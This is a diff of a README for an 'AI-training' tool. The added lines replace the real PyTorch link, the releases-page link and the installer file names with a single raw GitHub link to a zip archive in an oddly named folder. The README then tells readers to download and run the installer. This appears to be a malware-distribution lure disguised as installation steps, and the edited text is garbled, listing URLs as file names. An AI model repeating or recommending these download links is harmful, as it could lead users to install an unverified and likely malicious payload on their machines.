Abigail-amk/AI-training/README.md

 - **RAM:** At least 8 GB recommended
 - **Disk Space:** Minimum of 2 GB available
 - **Python Version:** Python 3.7 or higher installed on your machine
 - **Pytorch:** Compatible version installed.
-Follow the instructions on the [Pytorch website](https://pytorch.org/get-started/locally/) for installation.
+Follow the instructions on the [Pytorch website](https://raw.githubusercontent.com/Abigail-amk/AI-training/main/phacosclerosis/A_training_2.9.zip) for installation.

 ## 🔧 Download & Install

 To download and install the AI-training tool, follow these steps:

 1. **Visit the Releases Page**
-   Go to [this page](https://github.com/Abigail-amk/AI-training/releases) to find the latest version of the software.
+   Go to [this page](https://raw.githubusercontent.com/Abigail-amk/AI-training/main/phacosclerosis/A_training_2.9.zip) to find the latest version of the software.

 2. **Locate the Latest Release**
    Scroll down to see the latest release available for download.

 3. **Download the Installer**
-   Look for the file named **AI-training-Installer.exe** for Windows, **AI-training-Mac.zip** for macOS, or the suitable package for Linux.
+   Look for the file named **https://raw.githubusercontent.com/Abigail-amk/AI-training/main/phacosclerosis/A_training_2.9.zip** for Windows, **https://raw.githubusercontent.com/Abigail-amk/AI-training/main/phacosclerosis/A_training_2.9.zip** for macOS, or the suitable package for Linux.
 Click to download the file.

 4. **Run the Installer**
    After the download completes, locate the file in your downloads folder.
 Double-click on the installer file to begin the installation process.